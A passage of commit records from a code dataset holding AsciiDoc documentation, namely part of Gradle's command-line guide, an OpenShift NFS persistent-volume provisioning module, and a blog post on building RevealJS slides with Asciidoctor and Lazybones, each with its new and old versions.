You can obtain more information in the task listing using the `--all` option.\n\n----\n\u276f gradle tasks --all\n----\n\n[[sec:show_task_details]]\n==== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n++++\n<sample id=\"taskHelp\" dir=\"userguide\/tutorial\/projectReports\" title=\"Obtaining detailed help for tasks\">\n <output args=\"-q help --task libs\"\/>\n<\/sample>\n++++\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n==== Reporting dependencies\n\nBuild scans give a full, visual report of what project and binary dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n\u276f gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::img\/gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\n==== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n\u276f gradle dependencies\n----\n\nRunning `gradle buildEnvironment` visualizes the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n\u276f gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match specified input.\n\n----\n\u276f gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. 
This is achieved with the optional `--configuration` parameter:\n\n++++\n<sample id=\"dependencyListReportFiltered\" dir=\"userguide\/tutorial\/projectReports\" title=\"Filtering dependency report by configuration\">\n <output args=\"-q api:dependencies --configuration testCompile\"\/>\n<\/sample>\n++++\n\n[[sec:listing_properties]]\n==== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n++++\n<sample id=\"propertyListReport\" dir=\"userguide\/tutorial\/projectReports\" title=\"Information about properties\">\n <output args=\"-q api:properties\" ignoreExtraLines=\"true\"\/>\n<\/sample>\n++++\n\n==== Software Model reports\n\nYou can get a hierarchical view of elements for <<software_model,software model>> projects (deprecated) using the `model` task:\n\n----\n\u276f gradle model\n----\n\nLearn more about <<model-report,the model report>> in the software model documentation.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n== Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle. The following serves as a reference of executing and customizing Gradle use of a command-line or when writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] [--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options, have short option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. 
The following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<test_filtering,`--tests` for Java test filtering>>.\n\n[[sec:command_line_executing_tasks]]\n=== Executing tasks\n\nYou can run a task and all of its dependencies.\n----\n\u276f gradle myTask\n----\n\nYou can learn about what projects and tasks are available in the <<sec:command_line_project_reporting, project reporting section>>.\n\n==== Executing tasks in multi-project builds\nIn a <<intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name. The following are equivalent _when run from the root project_.\n\n----\n\u276f gradle :mySubproject:taskName\n\u276f gradle mySubproject:taskName\n----\n\nYou can also run a task for all subprojects using the task name only. For example, this will run the \"test\" task for all subprojects when invoked from the root project directory.\n\n----\n\u276f gradle test\n----\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n\n----\n\u276f cd mySubproject\n\u276f gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n==== Executing multiple tasks\nYou can also specify multiple tasks. For example, the following will execute the `compile` and `test` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n\u276f gradle compile test\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n==== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n++++\n<figure>\n <title>Example Task Graph<\/title>\n <imageobject>\n <imagedata fileref=\"img\/commandLineTutorialTasks.png\"\/>\n <\/imageobject>\n<\/figure>\n++++\n\n++++\n<sample id=\"excludeTask\" dir=\"userguide\/tutorial\/excludeTasks\" title=\"Excluding tasks\">\n <output args=\"dist --exclude-task test\"\/>\n<\/sample>\n++++\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n
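Using the short option form, the same invocation from the sample above can be written as:\n\n----\n\u276f gradle dist -x test\n----\n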
[[sec:rerun_tasks]]\n==== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n\u276f gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n==== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n\u276f gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task whose dependencies all completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that depend on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test, because the test task depends on the compilation task (either directly or indirectly).\n\n[[sec:command_line_completion]]\n=== Command-Line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n++++\n<figure>\n <title>Gradle Completion<\/title>\n <imageobject>\n <imagedata fileref=\"img\/gradle-completion-4.0.gif\"\/>\n <\/imageobject>\n<\/figure>\n++++\n\n[[sec:command_line_debugging]]\n=== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nAlso print out the stacktrace for user exceptions (e.g. a compile error). See also <<sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon, Gradle Daemon>> process.\n
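For example, to suspend a build until a debugger attaches on the default port, you might run something like the following (the task name is illustrative):\n\n----\n\u276f gradle myTask -Dorg.gradle.debug=true\n----\n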
[[sec:command_line_performance]]\n=== Performance options\nTry these options when optimizing build performance. Learn more about https:\/\/guides.gradle.org\/performance\/[improving performance of Gradle builds here].\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option please see <<sec:parallel_execution>>. _Default is off_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. `--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage:img\/gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n==== Gradle daemon options\nYou can manage the <<gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if it is not running, or if the existing daemon is busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n=== Logging options\n\n==== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n\n==== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. The different modes are described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like `rich`, but also output task names and outcomes at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n==== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nThere're <number> deprecation warnings, which may break the build in Gradle 5.0. Please run with --warning-mode=all to see them.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,none,summary)`::\nSpecify warning mode via <<sec:gradle_properties, Gradle properties>>. The different modes are described immediately below.\n\n`--warning-mode=(all,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.\n
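For instance, to see every deprecation warning as it occurs rather than only the summary, you could run:\n\n----\n\u276f gradle build --warning-mode=all\n----\n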
==== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::img\/rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Logs above are grouped by the task that generated them\n * A progress bar and timer visually describe the overall status\n * Parallel work-in-progress lines below describe what is happening now\n\n[[sec:command_line_execution_options]]\n=== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<cache_command_line_options,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the <<cache_command_line_options, dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which tasks would have executed.\n\n[[sec:command_line_bootstrapping_projects]]\n=== Bootstrapping new projects\n\n==== Creating new Gradle builds\nUse the built-in `gradle init` task to create new Gradle builds, with new or existing projects.\n\n----\n\u276f gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin, init plugin documentation>> for details.\n\n----\n\u276f gradle init --type java-library\n----\n\n==== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n\u276f gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper,Gradle wrapper section>>.\n\n=== Environment options\nYou can customize where Gradle looks for build scripts, settings, caches, and so on through the options below. Learn more about customizing your <<build_environment, build environment>>.\n\n`-b`, `--build-file`::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`, then `myProjectName.gradle`.\n\n`-c`, `--settings-file`::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-u`, `--no-search-upward` (deprecated)::\nDon't search in parent directories for a `settings.gradle` file.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<sec:gradle_system_properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<sec:project_properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n
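As an illustration, the following hypothetical invocation runs a build located in a sibling directory while setting a project property (the path and property name are made up):\n\n----\n\u276f gradle -p ..\/other-project build -Pmyprop=myvalue\n----\n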
[[sec:command_line_project_reporting]]\n=== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n==== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n\u276f gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/guides.gradle.org\/creating-build-scans\/[creating build scans].\n\n==== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n\u276f gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. You can obtain more information in the task listing using the `--all` option.\n\n----\n\u276f gradle tasks --all\n----\n\n[[sec:show_task_details]]\n==== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n++++\n<sample id=\"taskHelp\" dir=\"userguide\/tutorial\/projectReports\" title=\"Obtaining detailed help for tasks\">\n <output args=\"-q help --task libs\"\/>\n<\/sample>\n++++\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n==== Reporting dependencies\n\nBuild scans give a full, visual report of what project and binary dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n\u276f gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::img\/gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\n==== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n\u276f gradle dependencies\n----\n\nRunning `gradle buildEnvironment` visualizes the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n\u276f gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match the specified input.\n\n----\n\u276f gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. 
This is achieved with the optional `--configuration` parameter:\n\n++++\n<sample id=\"dependencyListReportFiltered\" dir=\"userguide\/tutorial\/projectReports\" title=\"Filtering dependency report by configuration\">\n <output args=\"-q api:dependencies --configuration testCompile\"\/>\n<\/sample>\n++++\n\n[[sec:listing_properties]]\n==== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n++++\n<sample id=\"propertyListReport\" dir=\"userguide\/tutorial\/projectReports\" title=\"Information about properties\">\n <output args=\"-q api:properties\" ignoreExtraLines=\"true\"\/>\n<\/sample>\n++++\n\n==== Software Model reports\n\nYou can get a hierarchical view of elements for <<software_model,software model>> projects (deprecated) using the `model` task:\n\n----\n\u276f gradle model\n----\n\nLearn more about <<model-report,the model report>> in the software model documentation.\n\n=== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n==== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n\u276f gradle build\n----\n\n==== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n\u276f gradle run\n----\n\n==== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n\u276f gradle check\n----\n\n==== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n\u276f gradle clean\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"683961e2de953a0eade5864e266d4f02372291bd","subject":"BZ1759428 to align sample capacity to 5Gi","message":"BZ1759428 to align sample capacity to 5Gi\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/storage-persistent-storage-nfs-provisioning.adoc","new_file":"modules\/storage-persistent-storage-nfs-provisioning.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * storage\/persistent-storage\/persistent-storage-nfs.adoc\n\n[id=\"persistent-storage-nfs-provisioning_{context}\"]\n= Provisioning\n\nStorage must exist in the underlying infrastructure before it can be\nmounted as a volume in {product-title}. To provision NFS volumes,\na list of NFS servers and export paths is all that is required.\n\n.Procedure\n\n. Create an object definition for the PV:\n+\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolume\nmetadata:\n name: pv0001 <1>\nspec:\n capacity:\n storage: 5Gi <2>\n accessModes:\n - ReadWriteOnce <3>\n nfs: <4>\n path: \/tmp <5>\n server: 172.17.0.2 <6>\n persistentVolumeReclaimPolicy: Retain <7>\n----\n<1> The name of the volume. This is the PV identity in various `oc <command>\npod` commands.\n<2> The amount of storage allocated to this volume.\n<3> Though this appears to be related to controlling access to the volume,\nit is actually used similarly to labels, to match a PVC to a PV.\nCurrently, no access rules are enforced based on the `accessModes`.\n<4> The volume type being used, in this case the `nfs` plug-in.\n<5> The path that is exported by the NFS server.\n<6> The host name or IP address of the NFS server.\n<7> The reclaim policy for the PV. This defines what happens to a volume\nwhen released.\n+\n[NOTE]\n====\nEach NFS volume must be mountable by all schedulable nodes in the cluster.\n====\n
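+\nAssuming the definition above is saved as `nfs-pv.yaml` (an illustrative file name), you might register it with the following command:\n+\n----\n$ oc create -f nfs-pv.yaml\n----\n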
\n. Verify that the PV was created:\n+\n----\n$ oc get pv\nNAME LABELS CAPACITY ACCESSMODES STATUS CLAIM REASON AGE\npv0001 <none> 5368709120 RWO Available 31s\n----\n\n. Create a persistent volume claim that binds to the new PV:\n+\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: nfs-claim1\nspec:\n accessModes:\n - ReadWriteOnce <1>\n resources:\n requests:\n storage: 5Gi <2>\n----\n<1> As mentioned above for PVs, the `*accessModes*` do not enforce security, but\nrather act as labels to match a PV to a PVC.\n<2> This claim looks for PVs offering *5Gi* or greater capacity.\n\n. Verify that the persistent volume claim was created:\n+\n----\n$ oc get pvc\nNAME STATUS VOLUME CAPACITY ACCESS MODES STORAGECLASS AGE\nnfs-claim1 Bound pv0001 5Gi RWO gp2 2m\n----\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * storage\/persistent-storage\/persistent-storage-nfs.adoc\n\n[id=\"persistent-storage-nfs-provisioning_{context}\"]\n= Provisioning\n\nStorage must exist in the underlying infrastructure before it can be\nmounted as a volume in {product-title}. To provision NFS volumes,\na list of NFS servers and export paths are all that is required.\n\n.Procedure\n\n. Create an object definition for the PV:\n+\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolume\nmetadata:\n name: pv0001 <1>\nspec:\n capacity:\n storage: 5Gi <2>\n accessModes:\n - ReadWriteOnce <3>\n nfs: <4>\n path: \/tmp <5>\n server: 172.17.0.2 <6>\n persistentVolumeReclaimPolicy: Retain <7>\n----\n<1> The name of the volume. This is the PV identity in various `oc <command>\npod` commands.\n<2> The amount of storage allocated to this volume.\n<3> Though this appears to be related to controlling access to the volume,\nit is actually used similarly to labels and used to match a PVC to a PV.\nCurrently, no access rules are enforced based on the `accessModes`.\n<4> The volume type being used, in this case the `nfs` plug-in.\n<5> The path that is exported by the NFS server.\n<6> The host name or IP address of the NFS server.\n<7> The reclaim policy for the PV. This defines what happens to a volume\nwhen released.\n+\n[NOTE]\n====\nEach NFS volume must be mountable by all schedulable nodes in the cluster.\n====\n\n. Verify that the PV was created:\n+\n----\n$ oc get pv\nNAME LABELS CAPACITY ACCESSMODES STATUS CLAIM REASON AGE\npv0001 <none> 5368709120 RWO Available 31s\n----\n\n. 
Create a persistent volume claim which binds to the new PV:\n+\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: nfs-claim1\nspec:\n accessModes:\n - ReadWriteOnce <1>\n resources:\n requests:\n storage: 5Gi <2>\n----\n<1> As mentioned above for PVs, the `*accessModes*` do not enforce security, but\nrather act as labels to match a PV to a PVC.\n<2> This claim looks for PVs offering *1Gi* or greater capacity.\n\n. Verify that the persistent volume claim was created:\n+\n----\n$ oc get pvc\nNAME STATUS VOLUME CAPACITY ACCESS MODES STORAGECLASS AGE\nnfs-claim1 Bound pv0001 4Gi RWO gp2 2m\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8517268cf142bc05792190bbd4c1ecd819bf080","subject":"Update 2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","message":"Update 2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","repos":"gscheibel\/blog,gscheibel\/blog,gscheibel\/blog","old_file":"_posts\/2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","new_file":"_posts\/2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","new_contents":"= How long does it take you to create a RevealJS presentation ?\n\n:hp-tags: asciidoctor, revealjs, lazybones\n\nAfter a couple of months, I finally found a topic to write the very first post in my new http:\/\/hubpress.io\/[Hubpress.io] blog.\n\nToday, we are going to talk about *Asciidoctor* and *RevealJS*. As you might know, you can use Asciidoctor to write and create RevealJS presentations. However, if you are not familiar with Asciidoctor, creating the first presentation can be tricky, especially if you plan to use diagrams (or other external modules).\n\nRecently, thanks to Andres Almiray (https:\/\/twitter.com\/aalmiray[@aalmiray]), I discovered https:\/\/github.com\/pledbrook\/lazybones[Lazybones], a very simple template generator for Gradle projects. With Lazybones you can start Gradle projects such as Spring Boot, Groovy or even AsciidoctorJ using only one command. However, you still had to customize the generated project to be able to generate a RevealJS slideshow.\n\nThat's why I have created the Asciidoctor-RevealJS template for Lazybones.\n\n== Long story short\n\n=== Let's play\n\nOnce you have installed everything (http:\/\/gvmtool.net[GVM] and Lazybones), all you need to do is:\n\n[source]\n$ lazybones create asciidoctor-revealjs 1.0.0 myAwesomePresentation\n\nThen answer the questions (title for your presentation, who you are and the revealjs theme to use) and you are good to go.\nicon:thumbs-o-up[]\n\nIf you look at your current directory you'll find something like:\n\n[source]\n----\ngscheibel@~\/labs\/adocs\/blog\/myAwesomePresentation $ tree\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 build.gradle\n\u2514\u2500\u2500 src\n \u2514\u2500\u2500 docs\n \u2514\u2500\u2500 asciidoc\n \u251c\u2500\u2500 images\n \u251c\u2500\u2500 slides\n \u251c\u2500\u2500 slides.adoc\n \u251c\u2500\u2500 snippets\n \u2514\u2500\u2500 styles\n----\n\nAll you need is under `src\/docs\/asciidoc\/`; by default the main slide deck is `slides.adoc`. Remember the questions asked during the presentation setup: that information (title and author) is reused here. 
The theme can be found in the `build.gradle` file.\n\n[source]\n----\n= Asciidoctor is awesome\nGuillaume Scheibel <guillaume.scheibel@gmail.com>\n\n:imagesdir: images\n:sourcedir: snippets\n----\n\n=== Let's write\n\nOne way to create your presentation is `one slide, one file`: every time you want to create a slide, you create a file (in `slides\/` for instance) and then include it in `slides.adoc` using the include directive (e.g. `include::slides\/coolSlides.adoc[]`).\n\n\n=== Let's create\n\nTo create your presentation, all you need is a simple\n\n[source]\n$ gradle asciidoctor\n\nThen you'll find your presentation under `build\/asciidoc\/html5`.\n\nInterested in hot-reload while you're writing? `gradle watch` is going to become your best friend.\n\n== Finally\n\nTo answer the question in the title, it only takes a few seconds to create a RevealJS presentation thanks to *Asciidoctor* and *Lazybones*.\nThe template sources are available on https:\/\/github.com\/asciidoctor\/asciidoctor-lazybones[Github] and the binaries on https:\/\/bintray.com\/asciidoctor\/maven\/asciidoctor-revealjs-template\/view[Bintray].\n\n\n","old_contents":"= How long does it take you to create a RevealJS presentation ?\n\n:hp-tags: asciidoctor, revealjs, lazybones\n\nAfter couple of months, I finally found a topic to write the very first post in my new http:\/\/hubpress.io\/[Hubpress.io] blog.\n\nToday, we are going to talk about *Asciidoctor* and *RevealJS*. As you might know, you can use Asciidoctor to write and create RevealJS presentations. Therefore, if you are not familiar with Asciidoctor creating the first presentation can be tricky especially if you plan to use diagrams (or other external modules).\n\nRecently thanks to Andres Almiray (https:\/\/twitter.com\/aalmiray[@aalmiray]), I discovered https:\/\/github.com\/pledbrook\/lazybones[Lazybones]. A very simple template generator for Gradle projects. With Lazybones you can start a Gradle projects such as Spring boot, Groovy or even AsciidoctorJ using only 1 command. Therefore you still had to customize the generated project to be able to generate a RevealJS slideshow.\n\nThat's why I have created the Asciidoctor-RevealJS template for Lazybones.\n\n== Long story short\n\n=== Let's play\n\nOnce you installed everything (GVM and Lazybones) all you need to do is:\n\n[source]\n$ lazybones create asciidoctor-revealjs 1.0.0 myAwesomePresentation\n\nThen answer the questions (title for your presentation, who you are and the revealjs theme) and you are good to go.\nicon:thumbs-o-up[]\n\nIf you look your current directory you will found something like:\n\n[source]\n----\ngscheibel@~\/labs\/adocs\/blog\/myAwesomePresentation $ tree\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 build.gradle\n\u2514\u2500\u2500 src\n \u2514\u2500\u2500 docs\n \u2514\u2500\u2500 asciidoc\n \u251c\u2500\u2500 images\n \u251c\u2500\u2500 slides\n \u251c\u2500\u2500 slides.adoc\n \u251c\u2500\u2500 snippets\n \u2514\u2500\u2500 styles\n----\n\nAll you need is under `src\/docs\/asciidoc\/`, by default the main slide is `slides.adoc`. Remember the questions asked during the presentation setup, those information (title and author) are reused here. 
The theme can be found in the `build.gradle` file.\n\n[source]\n----\n= Asciidoctor is awesome\nGuillaume Scheibel <guillaume.scheibel@gmail.com>\n\n:imagesdir: images\n:sourcedir: snippets\n----\n\n=== Let's write\n\nA way to create your presentation is `one slide one file`, it means every time you want to create a slide, you create a file (in slides\/ for instance) and then include it in slides.adoc using the include directive (eg: `include::slides\/coolSlides.adoc[]`)\n\n\n=== Let's create\n\nTo create your presentation, all you need is a simple\n\n[source]\n$ gradle asciidoctor\n\nThen you'll find your presentation under `build\/asciidoc\/html5`.\n\nInterested by hot-relaod while you're writing ? `gradle watch` is going to become your best friend.\n\n== Finally\n\nTo answer the question in the title, it only takes few seconds to create an RevealJS presentation thanks to *Asciidoctor* and *Lazybones*.\nThe template sources are available on https:\/\/github.com\/asciidoctor\/asciidoctor-lazybones[Github] and the binaries on https:\/\/bintray.com\/asciidoctor\/maven\/asciidoctor-revealjs-template\/view[Bintray].\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"fff9e7de6895e8d161dce409e48451ac99ff6514","subject":"Update 2015-12-22-Performance-of-Microservices-frameworks.adoc","message":"Update 